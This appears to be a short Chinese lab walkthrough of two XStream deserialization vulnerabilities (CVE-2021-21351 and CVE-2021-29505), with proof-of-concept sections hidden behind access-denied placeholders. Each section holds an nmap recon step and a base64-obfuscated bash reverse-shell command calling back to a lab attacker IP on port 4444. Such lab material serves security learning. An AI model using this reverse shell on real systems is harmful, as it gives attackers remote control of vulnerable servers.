(CVE-2021-21351)(CVE-2021-29505)
XStream 反序列化命令执行漏洞(CVE-2021-21351)
影响范围:XStream 1.4.16及之前版本
信息收集:nmap 192.168.85.130 -p 8080
您没有 权限 查看此处内容!
在实战中,如果目标Java版本较低,POC需要做修改,将其中的<__overrideDefaultParser>false</__overrideDefaultParser>改成<__useServicesMechanism>false</__useServicesMechanism>即可。
反弹shell:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}
您没有 权限 查看此处内容!
XStream 反序列化命令执行漏洞(CVE-2021-29505)
影响范围:XStream 1.4.17及之前版本
信息收集:nmap 192.168.85.130 -p 8080
您没有 权限 查看此处内容!
反弹shell:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}
您没有 权限 查看此处内容!
